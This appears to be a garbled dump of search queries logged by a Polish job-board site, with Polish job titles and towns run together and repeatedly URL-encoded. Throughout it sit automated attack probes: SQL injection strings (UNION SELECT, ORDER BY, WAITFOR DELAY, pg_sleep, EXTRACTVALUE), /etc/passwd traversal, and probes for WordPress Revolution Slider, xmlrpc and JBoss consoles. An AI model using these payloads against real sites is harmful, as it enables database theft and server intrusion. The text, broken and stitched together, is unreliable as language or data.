katowiceprodukcja+dla++niepełnosprawnych'+order+by+1--+wcvxpracownik%2bprodukcji%2b%25252528m%252fk%25252529pracownik%25252bprodukcji%25252b%2525252528m%252fk%2525252529monter instalacji sanitarnych niemcypraca%2bfizyczna%2bspawacz niemcyspecjalista%2bd/s%2bimportu%2b-eksportu%2b%252525252c%2bobs%25252525c5%2525252582uga%2bklienta%2b%252525252c%2bar%2b%252525252c%przemys%2525c5%252582 %25257c produkcja mazowieckiemanager+rejonu+sprzedażymonter wentylacji łódźmielecpracownik%25252bprodukcji-bez-jezyka-niemieckiego niemcyjabłonnapracownik+produkcji+spo%25c5%25bcywczej+%2528m/k%2529portugalniedźwiedźmagazynier %252528m/k%252529 warszawapracownik%2bpowierzchni%2bsprzeda%252525c5%252525bcy/kasjerspecjalista ds ubezpiecze%25c5%2584warehouse/wp-login.php%27a%3d0%27a%3d02121121121212.1photoshoppomocnik+budowlany niemcynowaopiekunka+do+osób+starszych+w+niemczech+bez+języjava krakówmonter%2bkonstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0%22%2band%2b%22monter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php%2band%2b1%3d1%27a%3d0'a=0-3483 union all select 14,14,14,14,14,concat(concat('qqzpq','rulwspjyntrjvwnbkzwfbudyabfjtydkspvpxiic'),'qbbvq'),14-- auuespecjalista%2bds.%2bplanowania%2bprodukcjipracownik+produkcji+-+praca+dla+kobiet+i+m%25c4%2599%25c5%25bcczyznkierowca++kat+c'+order+by+1--+suaymechanik,+operator+maszyn krakówpraca+pomoc+księgowej wielkopolskietechnolo konstrukcji mazowieckiemonter%2525252fka+element%252525252525c3%252525252525b3w+do+siedze%252525252525c5%25252525252584+samochodowychpomoc%252bksiegowejpracownik+produkcji-bez-jezykanauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" and row(9240,9184)>(select count(*),concat(0xredaktor treści psychologicznychdziale+zakup%252525c3%252525b3wasystent+w+dziale+kadr+i+p%c5%82ac%d0%a1%d0%be %d0%b7%d0%bd%d0%b0%d0%bd%d0%b8%d0%b5%d0%bc %d1%80%d1%83%d1%81%d1%81%d0%ba%d0%be%d0%b3%d0%bepraca+w+teatrze krakówaleksandrów+Łódzkispecjalista%252bds.%252bkadr%252bi%252bp%25c5%2582ac%252b%2528m/k%2529produkcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null,null,null,nullskrzypce na %252525c5%2525259blubiron mountainpracownik+czyszczenia+cz%c4%99%c5%9bci+maszynmonter konstrukcji/wp-login.php'a=0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php?action=revslider shpracownik hali katowicein%252525c5%252525bcynier budowy warszawaprodukcja dla niepełnosprawnych union all select null,null#mechanik+samochodowy niemcymonter konstrukcji/wp-login.php%252525252527a%25252525253d0/license.phppracownik%2bbudowlanki niemcynauczyciel język niemiecki/login.action/web-console/jmx-console/htmladaptor?action=inspectmbeandoradca%2bklientads.%2bszycia%2bna%2bmiar%2525c4%252599kierowca %28m/k%29 %28kat. c e%2c hakowce%29 niemcyfinanse+|+bankowośćrecepcjonista+ka poznańmonter/ka elementów do siedpakowacz bez językaelektryk %2525252528m/k%2525252529praca bez znajomo%25252525c5%252525259bci j%25252525c4%252525259 niemcypomocnik %c5%9bmiciarza niemcyindustry+|+production polandkierowca++kat+c%'+union+all+select+null--+lmxvgorzów wielkopolskiprodukcja dla niepełnosprawnych%' union all select null,null,null,null,null,null,null-- mucnkontrola%2bjako%252525c5%2525259bci mazowieckieoperator w%25252525252525c3%25252525252525b3zk%25252525252525c3%25252525252525b3w wid%25252525252525c5%2525252525252kierownik windykacji warszawakonsultant+ds.+obs%252525c5%25252582ug+klientapraca+fizyczna+sprzątaczka katowiceoperator monter wrocławdoradca+ds.+sprzedaży+samochodów+nowychksi%c4%99gowo%c5%9b%c4%87 %7c audyt %7c podatki pomorskiealuglass - realizacja piotr kalbarczyk';declare @x char(9);set @x=0x303a303a332;waitfor delay @x--in%2525c5%2525bcynier budowy/wp-login.php and 1%3d1monter konstrukcji/wp-login.php%25252527a%2525253d0/license.phpprzysuchapraca+bez+znajomo%c5%9bci+j%c4%9 niemcykierowca kat c%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- tvlbpraca fizyczna bez j%2525252525c4%252525252jedlina-zdrójstudent+workkierowca (m/k) (kat. c+e, hakowce) piłapraca%25252525252bz%25252525252bzakwaterowaniem polskawózki+widłowemonter%2fka element%25c3%25b3w do siedzepraca%25252bzakwterowaniempomoc ksi%252525c4%25252599gowakierowca kat c union all select 14%252c14%252c14%252c14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527hyjmaumgvckxychqldwdod%2bzaraz lubelskiepraca fizycznakucharz norwegiapraca%252bzdalnamonter konstrukcji%2fwp-login.php%2527a%253d0%2f07545460.php and 1%253d1%2527a%253d0kierowca w wypo%c5%bcyczalni samochomonter/ka element%25c3%25b3w do sipracownik do sortowania owoc%25252525c3%25252525b3w holandiakrzeszówasystent/ka%2bds.%2badministracji%2bi%2bobs%c5%82ugi%2bklienta lublinmagazynowy+%2525252528m/k%2525252529pracownik%252bobszaru%252bprodukcji%252b%2525252525252528m/k%2525252525252529hr%2c+kadry mazowieckiemonter%2525255c+pakowaczextractvalue(1,concat(char(126),md5(1590113738)))praca zdalna/wprowadzanie danychspawacz zbroje%252525c5%25252584projektowanie wn%25c4%2599trzmonter+konstrukcji/wp-login.php%25252527a%2525253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phpbudownictwo%252525252b%252525257c%252525252bgeodezjazdalne wpisywanie danych do bazy warszawafrezerspawacz%2bzbroje%25252525c5%2525252584pracownik%2badministracjipomoc+biurowa śląskieprodukcja%2bdla%2b%2bniepe%252525c5%25252582nosprawnych%25252527a%2525253d0przemys%2525c5%252582+%25257c+produkcja szczecinprzemys%252525c5%25252582+%2525257c+produkcja belgianauczyciel j%252525c4%25252599zyk niemiecki/login.actionspecjalista+ds+szkole%2525c5%252584produkcja+dla++niepe%c5%82nosprawnych%27a%3d0monter%252fka element%25252525c3%25252525b3w do siedze%25252525c5%252525warehouse/wp-login.php'a=0'a=0location=tychy99999"+union+select+unhex(hex(version()))+--+"x"="x/**/and/**/cast(md5('1594404000')mechanik%2bsilnik%2525c3%2525b3w%2blotniczychkonwojent rzeszówpracownik+do+sortowania+owoców holandiapraca+bez+znajomości+językaspecjalista ds. jako%25252525c5%252525259bcibudownictwo%2525252525252b%252525252525252525257c%2525252525252bgeodezja francjapraca transport krakówdrukarniaelektryk%252celektromonter niemcykierowca+c+e mazowieckiejunior front endpiekary+Śląskiekierowca%25252bc%25252bekontrola%252525252bjako%25252525252525c5%252525252525259bcipracownik powierzchni sprzeda%25252525c5%25252525bcypraca%2bogulnobudowlana niemcyasystent/ka ds. ksi%25252525c4%2525252599gowosciwarszawa,aluglass - realizacja piotr kalbarczyk") and 5575=1094 and ("ifmd"="ifmdmonter konstrukcji/wp-login.php%2525252527a%252525253d0/wp-admin/admin-ajax.php%252525253faction%252525253drevslider_show_image%kierowca w wypo%2525252525c5%2525252525bcyczprzemysł | produkcja czechowice-dziedzicepraca%2525252bfizyczna%2525252bbudowlanyinżynieria+|+projektowanie poznańkierowca+dostawcapracownik+księgowości śląskietrzcinnaspecjalista ds. sprzeda%25c5%25bcy produkt%25c3%25b3w bankowych katowicepraca++fizyczna+bez+j%2525252525technik%2bhandlowiecprodukcja+dla++niepe%25c5%2582nosprawnychspecjalista ds rozlicze%25c5%2584opiekun klienta poszukiwany%21%21%21 %7c szybkopraca.plkierownik warszawapraktyka+hr wrocławksięgowościmagazynier kościantłumacz niemcyjunior+front-end' warszawapraca fizyczna siemianowice Śląskiein%2525c5%2525bcynier+budowy/wp-login.php+and+1%3d1'and'c'='cmechanik%2bprzemys%252525252525c5%25252525252582owy/%2bmontermonter+konstrukcji/wp-login.php%25252527a%2525253d0/wp-content/uploads/51217766.phpprzemys%25252525c5%2525252582 %252525257c mistrz produkcjiin%2525c5%2525bcynier%2bbudowy/wp-login.php%22%2band%2b%22x%22%3d%22x'and(select*from(select+sleep(0))a/**/union/**/select+1)='badania i rozw%2525252525c3%2525252525b3jaaaaaaaabiuro+podróżyoperator wózka widłowego 20,23pracownik%2bstacji%2bpalowprodukcja%2blek%25252525c3%25252525b3wstep upasystent+klienta%252c+konsultant warszawaadministratorpracownik magazynowy łódzkiekierowca autobusu warszawaskrzypce na %c5%9blub katowicepracownik%252bbudowlankisap+mm+abap polandgastronomia %25257c cateringwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%22+and+%22x%22%3d%22monter+konstrukcji/wp-login.php%25252525252527a%2525252525253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phppraca+fizyczna+sprz%25c4%2585taczka sosnowiecoperator+cnc+frezer+tokarzspecjalista d/s importu -eksportu %252525252c obs%25252525c5%2525252582uga klienta %252525252c aenergetyka %25257c elektronika pomorskiehuman resources %7c kadry warszawaprodukcja dla niepełnosprawnych' union all select null,null,null,null-- zddspakowacz bez j%252525c4%25252599zyka niemcyw biurze stowarzyszenie, fundacja, organizacjepracownik+produkcji śląskiein%25c5%25bcynier+sprzeda%25c5%25bcyin%2525c5%2525bcynier%2bbudowy/wp-login.php%22%2band%2b%22x%22%3d%22x"and"s"="skierowca%2bkat.%2bce niemcypracownik+dzia%2525c5%252582u+w%2525c4%252599dliny/serypraca%2525252bfizyczna%2525252bsprz%25252525c4%2525252585taczkalogistyka | dystrybucjathe interface | tour | idesktop.tvСтроительство+|+геодезияnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/invoker/admin-console/transport%25252b%2525257c%25252bspedycjaprodukcja dla niepełnosprawnych' order by 1pracownik+umys%2525c5%252582owyinformatyka%2bprogramowanie%2bhelpdesk katowicespecjalista ds. wdro%c5%bcenia platformy telewizyjnejsortowanie warzyw Łódźosoba%2bsprz%c4%85taj%c4%85cadoradca+klientads.+szycia+na+miar%c4%99pracownik produkcji - nie wymagamy do%c5%9bwiadczenia sosnowiecdoradca+ds.+sprzedaży+samochodów+nowych'a=0../etc/passwdpracownik%2bporz%252525c4%25252585dkowywarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy99999%252522+union+select+unhex%252528hex%252528versiokowalekierowca%2bc%25252bekontrola+jako%25c5%259bci pomorskieprodukcja katowiceadministracja państwowapraca+dla+analityka+hta+%2528krak%25c3%25b3w%2529kontrola+jakości krakówpraca%252bz%252bzakwaterowaniemprzemysł+|+produkcja warszawapraca+biurowa Łódźprzemysł | produkcja podkarpackiemagazynier%2b%2c%2bpakowaczpracownik produkcji - bezp%c5%82atny dow%c3%b3z do miejsca pracy%21kierownik+sklepuspecjalista%2bds.%2bkadr%2bi%2bp%252525c5%25252582ac%2b%25252528m/k%25252529produkcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null,null#produkcja dla niepełnosprawnych' union all select null,null,null-- ucbzpraca+biurowa+z+obs%c5%82ug%c4%85+klienta warszawawarehouse/wp-login.phpa=0a=0z orzezceniemfizyczna%2ckierowca%2coperator%2c+roznaadministracja+biurowa małopolskiepraca biurowa z obs%25252525c5%2525252582ug%25252525c4%2525252585 klientatelefoniczny sprzedawca gdańskkierowca++kat+c+union+all+select+null%252cnull%252cnull%252cnull%252cnull%252cnull--+wujgprodukcja+dla++niepełnosprawnych+union+all+select+null,null#produkcja dla niepe%2525c5%252582nosprawnych 1/2 etatupracownik+produkcyjny+%252528m/k%252529kierowca++kat+c'+order+by+7661--+drsxtransport+%252525257c+spedycjamonter/ka+elementów+do+siedzeń+skonstruktor+obuwialider w dziale art. przemys%c5%82owych zgorzelecmagazynowy+%252528m/k%252529sta%25c5%25bcysta w dziale rekrutacjim%2525c5%252582odszy+konsultant+ds.+rekrutacji+%252528m/k%252529administracja pa%2525c5%252584stwow warszawamontażystanowogardpracownik+dzia%252525c5%25252582u+w%252525c4%25252599dlinybankowośćpraca fizyczna bez j%252525252525252525c4%25252525252525252599zykaskrzypce+na+%c5%9blubspecjalista+ds.+obs%252525c5%25252582ugi+klientapraca zakwaterowaniemdoradca+klienta+z+j%c4%99zykiem+niemieckimin%2525252525c5%2525252525bcynier+elektronik+%252525252528m/k%252525252529technik%2bkonsultant%2b%28m/k%29warmińskopracownik%2bobs%25c5%2582gi%2blotniskapraca pomoc księgowe rybnikpraca%2525252525252bzakwterowaniem polska(select (case when (4920=2666) then 'nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam' else (seprzemys%252525c5%25252582 %2525257c produkcja szczecinprzeciszówdoradca+klienta wrocławgastronomia+|+catering warszawaspecjalista+ds+kar+i+płac'a=0'a=0'doradztwo+%257c+konsulting warszawapraca fizyczna sprzątaczkaspecjalista ds. obs%252525c5%25252582ugi klientacie%25c5%259bla szalunkowy francjaspecjalista+ds+kadr+i+p%25252525c5%2525252582ackontrola%2525252525252bjako%25252525252525252525c5%252525252525252525259bci polskain%2525c5%2525bcynier budowy/wp-login.php%27 and %27x%27%3d%27x'and'o'='ograduate civil engineertłumacz+języka+ukraińskiegosamoch%2525c3%2525b3d s%2525c5%252582u%2525c5%2525bcbowypracownik+szklarni+z+ogórkamispecjalista+ds.+zakup%2525c3%2525b3wgraduate+civil/structural++engineergrafika %257c fotografia %257c kreacjaaaaaaaaapracownik produkcji %2528m/k%2529'a=0t%c5%82umacz j%c4%99zyka migowegopraca+w+magazynie+niemcy+bez+znajomo%25252525c5%252525259bci+j%25252525c4%2525252599zykasprzeda%25252525c5%25252525bc+%252525257c+obs%25252525c5%2525252582uga+klienta pomorskiepraca fizyczna częstochowatechnik elektryk %2528m/k%2529 szczecinprodukcja+dla++niepe%25c5%2582nosprawnych+1/2+etatudoradztwo | konsulting warszawakonstruktor oprzyrz%c4%85dowaniamonter konstrukcji%252fwp-login.php%252527a%25253d0%252f07545460.php and 1%25253d1%252527a%25253d0in%25c5%25bcynier+budowy/wp-login.phpgniezno%252525252525c5%2525252525259blusarz bez jezykatransport+|+spedycja śląskiepracownik%2bdzia%25c5%2582u%2bw%25c4%2599dlinytomaszów lubelskimagazynier lublinin%c5%bcynier produkcjiasystent+klienta%2525252c+konsultantpraca biurowa,magazynierze %c5%9brednim wykszta%c5%82ceniem warszawaspecjalista dwyk%c5%82adanie towaru dni%c3%b3wkaprzasnyszpracownik%2bporz%25252525c4%2525252585dkowy%2b%2525252528m/k%2525252529kierowca kat c union all select 14,14,14,concat(concat('qqzpq','xoirqgorcl'),'qbbvq'),14,14,14-- klbo' and 'x'='xedukacja+|+nauka+|+szkolenia białystokbez doświadczenia niemcynauczyciel+j%c4%99zyka+niemieckiegopraca%2bbez%2bjezyka%2bmagazynpraca%252bbez%252bjezyka niemcyobs%252525c5%25252582uga+maszynserwisant wózków widłowychspecjalista ds. kadr i p%252525c5%25252582acpracownik dzia%2525c5%252582u obs%2525c5%252582ugi klientadoradca%252btechniczny%252b%25252528komponenty%252bmaszyn%25252529sprzataczka w szkole" and "x"="yfinanse%2b%2525257c%2bbankowo%252525c5%2525259b%252525c4%25252587pracownik+oohrony warszawadoradca ds. sprzedaży samochodów nowych'a=0kierowca kat c union all select null%2cnull%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27cxqxjonpiiefyyvyknzvyixrpiwoxyxdxxqwajcoperator+w%2525c3%2525b3zka+wid%2525c5%252582owego+%252528m/k%252529warehouse/wp-login.php%27a%3d0%27a%3d0"+and+"x"="y tychydublinstolarz gdańskhuman resources | kadry wielkopolskieprzemys%2525252525c5%252525252582 %25252525257c produkcja pomorskiekontrola jako%25252525c5%252525259bci mazowieckiemenadżerpracownik+dzia%c5%82u+hrspecjalista+ds+sprzeda%c5%bcy+mieszka%c5%84kierowca++kat+c%252527+union+all+select+null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull--+phhradministracja+pa%25c5%2584smanager sprzedaży ząbkowice Śląskiespawacz monterspawacz+141monter oczyszczalni lublinspecjalista w szkolespecjalista%2bds%2bkadr%2bi%2bp%2525c5%252582acm%2525c5%252582odszy in%2525c5%2525bcynierz orzeczeniem/js/listing.jslesznomonter+p%252525c5%25252582ytbez%2bdo%2525252525c5%25252525259bwiadczeniahr%252c kadry%2527a%253d0hotels+hiszpa%c5%84skiego/wp-login.php'a=0kierowca++kat+c+union+all+select+null%2cnull%2cnull%2cnull--+wkbnpraca+biurowa legionowoin%252525c5%252525bcynier budowy/wp-login.phpstrzegomict teacherpracownik+produkcyjny+%2528m/k%2529praca%2bwakacyjnapracownik+biurowy oświęcimelektronik %2528m/k%2529 w zespole reklamacjipraca+w+biurze+z+językiem+ukrainskimtransport+%7c+spedycja zachodniopomorskiekancelaria notarialnamanager+%25c5%2582a%25c5%2584cucha+dostawspecjalista%252bds.%252badministracji%252b%2525252528m/k%2525252529operator+maszynmagazynier- praca na w%252525c3%252525b3zku wid%252525c5%25252582owymwieszanie+ubrań+i+wykładanie+kosmetyków+w+supersamach+lub+sklepachkierowca w wypo%25252525c5%25252525bcyczoperator+w%c3%b3zka+wid%c5%82owego holandiabychawapracownik+biurowy+na+magazyn krakówpracownik+monta%2525c5%2525bcu+%252528m/k%252529 katowicepraca%2bniemcy%2bpraca%2bfizyczna niemcyswitzerlandpracownik produkcji - bezpłatny dowóz do miejsca pracy!kędzierzyn-koźlegrafika+%257c+fotografia+%257c+kreacjaaaaaaaaarolnictwo+%7c+ochrona+%c5%9brodowiskamonter konstrukcji/wp-login.php%27a%3d0/wp-admin/wp-admin/admin-ajax.php%3faction%3drevslider show image%27a%3d0doradca+klientads.+szycia+na+miar%2525c4%252599 warszawajunior product development polandlider+w+dziale+produkt%25c3%25b3w+du%25c5%25bcej+konsumpcjioperator niepołomicepracownik%20magazynowy niemcyksięgowy dolnośląskiemagazynier%2cprodukcja%2ckierowcaopieka osob starszych warszawatransport%2b%25257c%2bspedycja%252522%2band%2b%252522x%252522%25253d%252522y%252527a%25253d0/etc/passwd%2525%2527+order+by+1--+lxhm''a=0praca%2bbez%2bznajomo%c5%9bci%2bpomoc+do+pakowania katowicepraca+bez+znajomo%252525c5%2525259bci+j%252525c4%25252599zykpraca+bez+znajomości+języka niemcymagazynier%2b%25252c%2bbudowlankamonter norwegiawarehouse/wp-login.php%27a%3d0%27a%3d0 and 1=1pracownik%252bprodukcji%252b%25252528m%2fk%25252529monter+konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0"+and+"x"="xkontrola%252bjako%2525c5%25259bci polskamonter+konstrukcji/wp-login.php%25252527a%2525253d0/wp-admin/admin-ajax.phpkierowca+w+wypożyczalni+samochodowej+(m/k) tychyprzedstawiciel%2bhandlowygłubczyceprojektant instalacji elektrycznychmłodszy specjalista ds. kadr i płactransport+%7c+spedycja+and+1>1pracownik powierzchni sprzeda%c5%bcy/kasjer warszawapracownik+magazynowy+%2525252528m/k%2525252529praca fizyczna bez j%c4%99zypraca fizyczna bez j%pomocnik+instalatora+instalacji+sanitarnychdoradca%2bklientads.%2bszycia%2bna%2bmiar%c4%99pracownik%2bgospodarczy niemcyprzemys%252525c5%25252582+%2525257c+produkcja mazowieckiepraca%252bbez%252bznajomo%2525c5%252praca fizyczna sprz%c4%85taczka opolesprzataczka+biurowa poznańpracownik+inwentaryzacji+za+granic%c4%85operator+wózków+widłowychpraca%2bbez%2bznajomo%2525252525c5%25252525259bci%2bj%2525252525c4%25252pracownik+utrzymania+czysto%c5%9bci+police%2c+szczecin%2c+pilchowo%2c+prz%c4%99socin%2c+zachodniopomorskiespecjalista+ds+wsparcia+sprzedaży warszawapraca%2bbez%2bznajomo%252525c5%25252kontrola%252bjako%25c5%259bci polskasortowaczmilanówekdoradca ds. sprzeda%25c5%25bcy samochod%25c3%25b3w nowychpracownik produkcji - praca w godz. 7-15kraśnikgrecjanauczyciel+j%25c4%2599zyk+niemiecki/login.action/web-console/admin-console/github.com/joaomatosf/jexbosspracownik%2bumys%252525c5%25252582owyt%25252525c5%2525252582umaczpraca+dla+pa%c5%84+i+pan%c3%b3win%252525c5%252525bcynieringum%25c5%2582odszy+konsultant+sprzeda%25c5%25bcyŁaziska+górnenauczyciel+języka+niemieckiegosprzataczka w szkole" and "x"="xpraca%252bbez%252bznajomo%25c5%259bci%252bj%25c4%2599zykawągrowiecwprowadzanie danych z orzeczeniempracownik+produkcji-bez-jezyka niemcyopieka%27 and %27x%27%3d%27xspecjalista+bhp warszawapracownik%252bprodukcji%252b%2525252528m/k%2525252529 niemcypracownik+magazynowy+-+atrakcyjna+stawka+i+bezp%c5%82atny+dojazdtransport%2b%252525257c%2bspedycjaaaaaaaaafrancjaspecjalista+ds.+sprzedadoradztwo+%257c+konsultingochrona bonarkapoznańmonter%2bkonstrukcji/wp-login.php%25252527a%2525253d0/07545460.php%2band%2b1%2525253e1specjalista ds. logistyki ŁÓdŹniepe%25c5%2582ny etattransport+%25257c+spedycja%252527a%25253d0%252527a%25253d0storekierowca w wypo%25252525252525c5%25252525252525bcyczalni samochodowej %2525252525252528m%252fk%2525252525252529 niemcypracownik+powierzchni+sprzeda%2525c5%2525bcy/kasjer warszawapo%2525c5%252582%2525c4%252585czenia%2bprzychodz%2525c4%252585cemagazynier+-+nie+wymagamy+doświadczenia!bojszowyropczycemagazynier%252cprodukcja%252ckierowca+kat.bpłatnos+cipracownik%2bpowierzchni%2bsprzeda%25c5%25bcyprzemysł | produkcja pomorskieprzemys%c5%82 %7c produkcja krojczymonter konstrukcji/wp-login.php%27a%3d0/07545460.php/error_log.phpkonstancin -jeziornapraca%2bgastronomiaслесарьinżynier budowy/wp-login.php' and 'x'='y"and"w"="i'a=0referent ds. administracji %2525252528m/k%2525252529dla ucznia poznańadministracja+biurowa wrocławpracownik powierzchni sprzeda%252525c5%252525bcypracownik%2bdo%2bwyk%25252525c5%2525252582adania%2btowaruwiskitkipracownik%2bprodukcyjny%2b%2525252528m/k%2525252529przemys%25252525c5%2525252582 %252525257c produkcjapracownik produkcji - nie wymagamy doświadczeniaaluglass - realizacja piotr kalbarczyk") and 4035=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysuscredit analystpracownik%2bmonta%25c3%2585%25c2%25bcupraca fizyczna zatortransport+|+spedycja mazowieckietransport | spedycja" and "x"="y'a=0 tychywprowadzanie+danych++z+orzeczeniem warszawaprzemys%2525c5%252582+%25257c+produkcja kujawsko-pomorskiemechanik przemys%25c5%2582owyaluglass - realizacja piotr kalbarczyk") rlike (select (case when (9312=3632) then 0x616c75676c617373202d207265616c697a61636a612witanowicebadania+i+rozw%2525252525c3%2525252525b3jaaaaaaaaasystent/ka%252bds.%252badministracji%252bi%252bobs%2525c5%252582ugi%252bklientapraca pracownicy wykonujący prace proste maków mazowieckibrand+managerpraca%252b%252bfizyczna%252bbez%252bj%252525c4%25252599zykasprzedawca%2c+niania%2c+operatorka+linii+produkcyjnejasystent/ka%2bds.%2badministracji%2bi%2bobs%25c5%2582ugi%2bklienta%2bze%2bznajomo%25c5%259bci%25c4%2585%2bj%25c4%2599zyka%2bruskbudownictwo %25257c geodezja pomocnikkierowca kat c union all select null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull-- wkxhadministracja%2bpa%c5%84sasystent/ka+ds.+ksi%c4%99gowosci warszawatransport %7c spedycja and 1%3e1wózki widłowepracownik biurowyaaaaaaaa goleniówasystent+klienta%2c+konsultant warszawaСельское хозяйство | охрана окружающей средыprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,concat(0x7170627871,0x7147744e465853694a78,0x717a786a71)#transport+|+spedycja warszawatransport%2b%25257c%2bspedycja%252522%2band%2b%252522x%252522%25253d%252522ymagazynier %25252c budowlankakomponenty maszynoperator w%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w wid%2525252525c5%25252nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam rlike (select (case when (4902=7036) then 0x6epłytkarzdzia%c5%82 obs%c5%82ugi klientapracownik produkcji gdyniakierowca++kat+c%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+phhrtransport %25252525257c spedycja%252525252527a%25252525253d0pracownik+ochrony wielkopolskiekierownik+region%25c3%25b3wdsbpomocnik wrocławpraca+fizyczna skierniewiceinżynier procesupracownik%2bprodukcji%2bp%25252525c5%2525252582o%25252525c5%2525252584skaluglass - realizacja piotr kalbarczyk rlike (select (case when (2038=1757) then 0x616c75676c617373202d207265616c697a61636a61207bez+do%252525c5%2525259bwiadczeniamiędzybrodzieprzemysł+|+produkcja ciechanówautomatyk utrzymania ruchulider+w+dziale+art.+przemys%25252525c5%2525252582owychpracownik powierzchni sprzedaży/kasjer tomaszów mazowieckialuglass - realizacja piotr kalbarczyk" and 7510=3259 and "ilhe"="ilhedziale zakup%25c3%25b3wpracownik administracyjno-biurowy warszawakierowca%25252bw%25252bwypo%2525c5%2525bcyczalni%25252bsamochodowej%25252b%252528m/k%252529project controllermanager gastronomiajunior itmonter/ka+element%c3%b3w+do+siedze%c5%84+samochodowy niemcykontrola jako%c5%9bci mazowieckiespedytor mi%252525c4%25252599dzynarodowypracownik%2bmagazynu niemcykierowca kat c union all select 14,14,14,14,14,14,concat(concat('qqzpq','styyhaweefxsozfxkpjtrzelqghnfqccmtuqulif'),'qbbvq')-- ручная+работа Польшаpraca pomoc ksi%25252525c4%2525252599gowepraca+fizyczna+w+rolnictwie poznańspedytor+mi%25252525c4%2525252599dzynarodowybardokonsultant telefoniczny ds. sprzeda%c5%bcy produkt%c3%b3w bankowychaluglass - realizacja piotr kalbarczyk" and 8739=(select 8739 from pg_sleep(32)) and "nxca"="nxcaserwis | technika | montaż warszawainżynier sanitarny warszawaaluglass - realizacja piotr kalbarczyk" waitfor delay '0:0:32' and "lvhi"="lvhikierowca+w+wypo%25252525c5%25252525bcyczalni+samochodowej+%2525252528m/k%2525252529 niemcysta%c5%bc+marketingtransport+%7c+spedycjaaaaaaaaaprzemys%25252525c5%2525252582 %252525257c produkcja kujawsko-pomorskienauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" rlike (select (case when (3485=3485) then 0x6obsługa interesantów łódzkieelektryk%2b%252525252528m/k%252525252529pracownik+ochrony krakówsekretarka+ze+znajomością+j.+rosyjskiego krakówelektryk podkarpackielogistyka+|+dystrybucja polandpraca%25252bbez%25252bjezyka%25252bmagazyn niemcyżorymonter\ pakowaczoperator w%2525c3%2525b3zkaasystent%20dzia%c5%82u%20hrpraca fizyczna sprz%c4%85taczka bytommonter oczyszczalnipracownik%25252bprodukci niemcymarketing+%7c+reklama+%7c+pr warszawapracownik+produkcji+%2525252528m/k%2525252529'a=0handlowiec it warszawaadministrator+system%252525c3%252525b3woperator w%c3%b3zka wid%c5%82owego niemcytechnik%2belektryk%2b%2528m/k%2529 polskamonter konstrukcji/xmlrpc.php%2527a%253d0%2527a%253d0monter\ pakowacz Świebodzinpracownik magazynowy - 18%252c29 z%25c5%2582 brutto/godz. plus premiebudownictwo%2b%252525257c%2bgeodezja francjaprodukcja dla niepe%c5%82nosprawnych%25' union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%23montażysta+elementów+elektromagnetycznychbudownictwo%252525252b%25252525257c%252525252bgeodezjamagazynowy+%252528m/k%252529 warszawasocjolod, j.niemiecki krakówpracownik+powierzchni+sprzeda%25c5%25bcy/kasjerdoradca ds. kredyt%2525252525c3%2525252525b3wdywitytransport%252b%25257c%252bspedycja%252band%252b1%253e1sortowanie listow warszawapraca+fizyczna+budowlany wrocławoperator w%25252525c3%25252525b3zk%25252525c3%25252525b3w wid%25252525c5%252transport%2b%257c%2bspedycja%27%2band%2b%27x%27%3d%27ywarehouse sosnowiecpracownik produkcji spo%252525c5%252525bcywczej %25252528m/k%25252529specjalista%252bds.%252bp%2525252525c5%252525252582ac%252bi%252bkadrsprzedaż | obsługa klienta rybniktechnolog krakówlakiernik+samochodowypracownik+ma poznańoperator+w%25c3%25b3zka+wid%25c5%2582owego belgia/etc/passwd+union+all+select+null,null--+lzdlpracownik produkcji okienpracownik%2525252525252bprodukcji-bez-jezyka-niemieckiegobrzeszczepraca+fizyczna krakówenergetyka %2525257c elektronikaspecjalista ds. ksi%25c4%2599gowo%25c5%259bcienergetyka %257c elektronika warszawapakowacz bez j%c4%99zyka warszawaaluglass - realizacja piotr kalbarczyk,(select 3842 from (select row(3842,1121)>(select count(*),concat(0x716a786271,(select (elpracownik+montażu+(m/k) bytomhr%2c+kadrydoradca ds. sprzeda%25c5%25bcy samochod%25c3%25b3w nowych%27a%3d0/etc/passwd%25%27 union all select null-- vzzrwarehouse worker/wp-login.php%25252527a%2525253d0monter konstrukcji/wp-login.php%2527a%253d0/wp-admin/wp-admin/admin-ajax.php%253faction%253drevslider_show_imageoperation managerwieliszewpracownik do produkcji pizzypraca%252bbez%252bznajomo%2525c5%25259bci%252bj%2525c4%252599zykakierowca w wypo%2525252525c5%2525252525bcyczalni samochodowej %252525252528m%25252fk%252525252529 niemcypracownik monta%2525252525c5%2525252525bcuchwaszczynoasystent w dziale kadr i płac gdynianauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") and 1767=(select 1767 from pg_sleep(32)) andwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%22 or %281%2c2%29%3d%28select%2afrom%28select name_const%28char%28111%2c1kurs na w%25c3%25b3zek wid%25c5%2582owypraca%252bzdalna polskaprojektant 